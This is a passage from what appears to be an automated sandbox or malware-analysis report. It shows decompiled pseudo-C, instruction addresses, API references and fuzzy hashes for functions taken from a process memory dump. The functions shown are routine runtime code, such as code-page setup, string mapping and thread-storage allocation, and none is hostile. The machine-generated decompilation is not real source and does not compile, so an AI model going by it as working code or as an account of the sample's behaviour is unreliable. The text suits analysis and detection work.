									_push(_t130); // executed
									E0026910B(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E0026A6F6(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00266BF5(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
									E00266E03(0x2a00e0, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E0026FBBB(_t148);
									}
								}
								L25:
								E002716CB(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E0026C634(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00261EDE(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E0026C699(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E0026134C(__eflags, 0x1e, _t151 + 0x1e);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E0026134C(_t156, 0x1d, _t151 + 0x1e);
					E00266E03(0x2a00e0, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

0x0026399d
0x0026399d
0x002639a2
0x002639ac
0x002639b2
0x002639b4
0x002639bb
0x002639d9
0x002639e0
0x00263c22
0x00263c28
0x00000000
0x00263c28
0x002639e8
0x002639f9
0x002639ff
0x00000000
0x00000000
0x00263a0b
0x00263a0b
0x00263a11
0x00263a22
0x00263a23
0x00263a2c
0x00263a31
0x00263a38
0x00263a3d
0x00263a4c
0x00263a4f
0x00263a54
0x00263a57
0x00263a5a
0x00263aaf
0x00263aaf
0x00263ab5
0x00263b11
0x00263b1f
0x00263b33
0x00263b40
0x00263b46
0x00263b4c
0x00263b54
0x00263b5a
0x00263b66
0x00263b72
0x00263b75
0x00263b78
0x00263b7e
0x00263b84
0x00263b8a
0x00263b90
0x00263b96
0x00263b9c
0x00263bb5
0x00263b9e
0x00263b9e
0x00263b9f
0x00263ba0
0x00263ba1
0x00263ba1
0x00263bcf
0x00263bd1
0x00263be0
0x00263be2
0x00263c0f
0x00263be4
0x00263bf1
0x00263bfd
0x00263c02
0x00263c04
0x00263c08
0x00263c08
0x00263c04
0x00263c11
0x00263c17
0x00263c1d
0x00000000
0x00263c1f
0x00263ab7
0x00263abd
0x00263ac3
0x00000000
0x00000000
0x00263aec
0x00263af5
0x00263af5
0x00263b0c
0x00000000
0x00263b0c
0x00263a5c
0x00263a62
0x00263a82
0x00263a82
0x00263a84
0x00263a97
0x00263aaa
0x00263a86
0x00263a86
0x00263a86
0x00000000
0x00263a84
0x00263a64
0x00263a72
0x00263a78
0x00000000
0x00263a78
0x00263a66
0x00263a70
0x00000000
0x00000000
0x00000000
0x00263a70
0x00263a13
0x00263a19
0x00000000
0x00263a1b
0x00263a1b
0x00000000
0x00263a1b
0x002639bd
0x002639c3
0x002639cf
0x00263c2d
0x00263c2d
0x00263c2f
0x00263c33
0x00263c3d
0x00263c3d

APIs

__EH_prolog.LIBCMT ref: 002639A2

Strings

CMT, xrefs: 002639B1

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 037e513c6e2abd53637cd2db620f843ff90afbcd5c00a522b6c4b43dd66f5100
Instruction ID: 61b19fab0f180e25f933211f32eb1742a738778a39d900576909c3de7af363ac
Opcode Fuzzy Hash: 037e513c6e2abd53637cd2db620f843ff90afbcd5c00a522b6c4b43dd66f5100
Instruction Fuzzy Hash: 7871F371520F45AECB21DF74CC819E7B7E8AF14301F44496EE5EB97142DA326AA8DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0028A51E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0028A51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;
				char* _t95;
				intOrPtr _t99;
				signed int _t100;

				_t93 = __edx;
				_t63 =  *0x29d668; // 0xd26a0a57
				_v8 = _t63 ^ _t100;
				_t99 = _a4;
				_t4 = _t99 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t99 + 0x119; // 0x28ab69
					_t94 = _t47;
					_t88 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t94;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t95 = _t94 + _t88;
						_t69 = _t68 + _t95;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t95 = 0;
							} else {
								_t72 = _t99 + _t88;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t88 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
							_t54 = _t88 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t95 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t99 + 0x119; // 0x28ab69
						_t94 = _t61;
						_t88 = _t88 + 1;
						__eflags = _t88 - 0x100;
					} while (_t88 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t91 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t106 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t91 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t91 = _t91 + 2;
						__eflags = _t91;
						_t75 =  *_t91;
					}
					_t13 = _t99 + 4; // 0x5efc4d8b
					E0028B5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t99 + 4; // 0x5efc4d8b
					_t19 = _t99 + 0x21c; // 0x2ebf88b
					E002897C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t99 + 4; // 0x5efc4d8b
					_t23 = _t99 + 0x21c; // 0x2ebf88b
					E002897C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t92 = 0;
					do {
						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t99 + _t92 + 0x119) = 0;
							} else {
								_t37 = _t99 + _t92 + 0x19;
								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
								goto L15;
							}
						} else {
							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
							L15:
							 *(_t99 + _t92 + 0x119) = _t68;
						}
						_t92 = _t92 + 1;
					} while (_t92 < 0x100);
				}
				return E0027E203(_t68, _v8 ^ _t100);
			}

0x0028a51e
0x0028a529
0x0028a530
0x0028a535
0x0028a540
0x0028a552
0x0028a64a
0x0028a64a
0x0028a650
0x0028a652
0x0028a653
0x0028a653
0x0028a655
0x0028a65b
0x0028a65b
0x0028a65d
0x0028a65f
0x0028a668
0x0028a66b
0x0028a677
0x0028a67e
0x0028a68e
0x0028a680
0x0028a680
0x0028a683
0x0028a683
0x0028a683
0x0028a687
0x0028a687
0x00000000
0x0028a687
0x0028a66d
0x0028a66d
0x0028a672
0x0028a672
0x0028a68a
0x0028a68a
0x0028a68a
0x0028a690
0x0028a696
0x0028a696
0x0028a69c
0x0028a69d
0x0028a69d
0x0028a558
0x0028a558
0x0028a55a
0x0028a55a
0x0028a561
0x0028a562
0x0028a566
0x0028a56c
0x0028a572
0x0028a59a
0x0028a59a
0x0028a59c
0x00000000
0x00000000
0x0028a57b
0x0028a57f
0x0028a591
0x0028a591
0x0028a593
0x00000000
0x00000000
0x0028a584
0x0028a586
0x0028a588
0x0028a590
0x0028a590
0x00000000
0x0028a590
0x00000000
0x0028a586
0x0028a595
0x0028a595
0x0028a598
0x0028a598
0x0028a59f
0x0028a5b4
0x0028a5ba
0x0028a5ce
0x0028a5d5
0x0028a5e4
0x0028a5f6
0x0028a5fd
0x0028a605
0x0028a607
0x0028a607
0x0028a611
0x0028a621
0x0028a623
0x0028a63a
0x0028a625
0x0028a625
0x0028a625
0x0028a625
0x0028a62a
0x00000000
0x0028a62a
0x0028a613
0x0028a613
0x0028a618
0x0028a631
0x0028a631
0x0028a631
0x0028a641
0x0028a642
0x0028a646
0x0028a6b1

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0028A543

Strings

, xrefs: 0028A588

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 0104e31af89c7e4e25dc8edbef7526e7a21bb8ba1e807786ac8bc66d5528b893
Instruction ID: 0dccd6b75a86c29dacf60ecf4c3da040b8b790dd14d9b59f2d8417e9127c0f5f
Opcode Fuzzy Hash: 0104e31af89c7e4e25dc8edbef7526e7a21bb8ba1e807786ac8bc66d5528b893
Instruction Fuzzy Hash: A5417E749152589EEF229E24CC84BF6BBBDEB05304F1C04EED58A87182E63599A5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00261D61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00261D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E0027D870(E00291173, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E0026399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E002616C0(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00261837(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00270FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00271059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00271094();
					}
					E00261837(_t68, E00282B33( *_t68));
					_t49 = 1;
				}
				E0026159C(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}

0x00261d61
0x00261d61
0x00261d66
0x00261d6f
0x00261d73
0x00261d76
0x00261d79
0x00261d7c
0x00261d7f
0x00261d82
0x00261d8a
0x00261d90
0x00261d97
0x00261d9f
0x00261da7
0x00261db2
0x00261db5
0x00261db9
0x00261dbf
0x00261dc4
0x00261dce
0x00261de6
0x00261e07
0x00261de8
0x00261de8
0x00261df0
0x00261df9
0x00261df9
0x00261dd0
0x00261dd0
0x00261dd3
0x00261dd5
0x00261dd8
0x00261dd8
0x00261e17
0x00261e1d
0x00261e1f
0x00261e23
0x00261e2e
0x00261e38

APIs

__EH_prolog.LIBCMT ref: 00261D66

Part of subcall function 0026399D: __EH_prolog.LIBCMT ref: 002639A2

Strings

CMT, xrefs: 00261D9D

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 2e5e383f7cc5a2cc30d62d57f3f89bc8530e7bd82cca86fdbf0a0e468498b66d
Instruction ID: 9c37da38a77582fead8c3c049ce69f4938a31cccc3f1231e157b27e90a59ff78
Opcode Fuzzy Hash: 2e5e383f7cc5a2cc30d62d57f3f89bc8530e7bd82cca86fdbf0a0e468498b66d
Instruction Fuzzy Hash: 0E2168729101099FCB15EF98C9419EEFBF6EF08300B1400ADE849A3251CB326EB0CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00289C64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00289C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				intOrPtr* _t30;
				signed int _t32;

				_t25 = __ecx;
				_push(__ecx);
				_t18 =  *0x29d668; // 0xd26a0a57
				_v8 = _t18 ^ _t32;
				_push(__esi);
				_t20 = E00289990(0x16, "LCMapStringEx", 0x296084, "LCMapStringEx"); // executed
				_t30 = _t20;
				if(_t30 == 0) {
					_t22 = LCMapStringW(E00289CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x292260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t30();
				}
				return E0027E203(_t22, _v8 ^ _t32);
			}

0x00289c64
0x00289c69
0x00289c6a
0x00289c71
0x00289c74
0x00289c86
0x00289c8b
0x00289c92
0x00289cd5
0x00289c94
0x00289cb1
0x00289cb7
0x00289cb7
0x00289ce9

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00289CD5

Strings

LCMapStringEx, xrefs: 00289C75, 00289C7F

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 900d0257f89c1a3723849dff73c175df221762aff36db4364faf647bc6df89af
Instruction ID: f4abf9633d111ac6bd647f3ce9ce7505179b19fc28fe4702d0b16c1ed656f7c7
Opcode Fuzzy Hash: 900d0257f89c1a3723849dff73c175df221762aff36db4364faf647bc6df89af
Instruction Fuzzy Hash: 2A011336551209BBCF12AF90DD09DAE3FA6FB08710F044155FE18261A1C6738971EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00289C02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00289C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				intOrPtr* _t19;
				signed int _t21;

				_push(__ecx);
				_t8 =  *0x29d668; // 0xd26a0a57
				_v8 = _t8 ^ _t21;
				_t10 = E00289990(0x14, "InitializeCriticalSectionEx", 0x29607c, 0x296084); // executed
				_t19 = _t10;
				if(_t19 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x292260(_a4, _a8, _a12);
					_t11 =  *_t19();
				}
				return E0027E203(_t11, _v8 ^ _t21);
			}

0x00289c07
0x00289c08
0x00289c0f
0x00289c24
0x00289c29
0x00289c30
0x00289c4d
0x00289c32
0x00289c3d
0x00289c43
0x00289c43
0x00289c61

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00289291), ref: 00289C4D

Strings

InitializeCriticalSectionEx, xrefs: 00289C1D

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 1441763260429337adedb50e80ec70f343b34360184e49526b8fef75fcd57599
Instruction ID: 68565b7a318649396e7966396cfc447077bc4ec5a6afa70a236f6185542e6771
Opcode Fuzzy Hash: 1441763260429337adedb50e80ec70f343b34360184e49526b8fef75fcd57599
Instruction Fuzzy Hash: 23F0B435A5220CFBCF116F60EC09CAE7FA5EF09721B014156FD09161A0CA724E70EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00289AA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00289AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				intOrPtr* _t15;
				signed int _t17;

				_push(__ecx);
				_t4 =  *0x29d668; // 0xd26a0a57
				_v8 = _t4 ^ _t17;
				_t6 = E00289990(3, "FlsAlloc", 0x296040, 0x296048); // executed
				_t15 = _t6;
				if(_t15 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0x292260(_a4);
					_t7 =  *_t15();
				}
				return E0027E203(_t7, _v8 ^ _t17);
			}

0x00289aac
0x00289aad
0x00289ab4
0x00289ac9
0x00289ace
0x00289ad5
0x00289ae6
0x00289ad7
0x00289adc
0x00289ae2
0x00289ae2
0x00289afa

APIs

TlsAlloc.KERNEL32 ref: 00289AE6

Strings

FlsAlloc, xrefs: 00289AC2

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 63d9f074eb437c1cd6c3f80cc93977d4ba8b7f6d743dd455ea26af24ff59ceb1
Instruction ID: 9a7336fb0ace171abb4731604653eb1a88809dd53e25b50886c9b2fd08d9ec14
Opcode Fuzzy Hash: 63d9f074eb437c1cd6c3f80cc93977d4ba8b7f6d743dd455ea26af24ff59ceb1
Instruction Fuzzy Hash: B8E0E535A66218BB8B24BB61AC0AD7EBBA8EB05750B05009AFC0957281DE705E7097D5

Uniqueness

Uniqueness Score: -1.00%

Function 0028281A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0028281A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E002826F9(4, "FlsAlloc", 0x294394, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L0027E2DD();
				return  *_t6(_a4);
			}

0x0028282f
0x00282834
0x0028283b
0x0028284e
0x0028284e
0x00282842
0x0028284b

APIs

try_get_function.LIBVCRUNTIME ref: 0028282F

Strings

FlsAlloc, xrefs: 0028281E, 00282828

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 6478eee01e7920cea615d0508462350e6c459f053055fad98bb3a96a2b47e8fb
Instruction ID: 7ba8ae6501771274b276ddd77e3eb6606793c7a3dfc9c5528a68908983f5081a
Opcode Fuzzy Hash: 6478eee01e7920cea615d0508462350e6c459f053055fad98bb3a96a2b47e8fb
Instruction Fuzzy Hash: DFD05B31792734F78D1036F5BC02D9A7E58CB02BB1F0541E2FF0C65183D565543156D5

Uniqueness

Uniqueness Score: -1.00%

Function 0028A873, Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0028A873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t76;
				signed int _t79;
				signed char* _t80;
				short* _t81;
				int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t48 =  *0x29d668; // 0xd26a0a57
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t76 = E0028A446(__eflags, _a4);
				if(_t76 != 0) {
					_t92 = 0;
					__eflags = 0;
					_t79 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x29d828)) - _t76;
						if( *((intOrPtr*)(_t51 + 0x29d828)) == _t76) {
							break;
						}
						_t79 = _t79 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t79;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t76 - 0xfde8;
							if(_t76 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t76 - 0xfde9;
								if(_t76 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t76,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x2c0854 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E0028A4B9(_t96);
												goto L37;
											}
										} else {
											E0027E920(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t76;
											 *(_t96 + 0x21c) = _t92;
											_t76 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t86 = _t71[1];
														__eflags = _t86;
														if(_t86 == 0) {
															goto L16;
														}
														_t89 = _t86 & 0x000000ff;
														_t87 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t87 - _t89;
															if(_t87 > _t89) {
																break;
															}
															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
															_t87 = _t87 + 1;
															__eflags = _t87;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t96 + 0x1a;
												_t85 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t85 = _t85 - 1;
													__eflags = _t85;
												} while (_t85 != 0);
												 *(_t96 + 0x21c) = E0028A408( *(_t96 + 4));
												 *(_t96 + 8) = _t76;
											}
											_t93 = _t96 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0028A51E(_t76, _t89, _t93, _t96, _t96); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E0027E920(_t92, _t96 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x29d838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t80 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t80[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t80 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
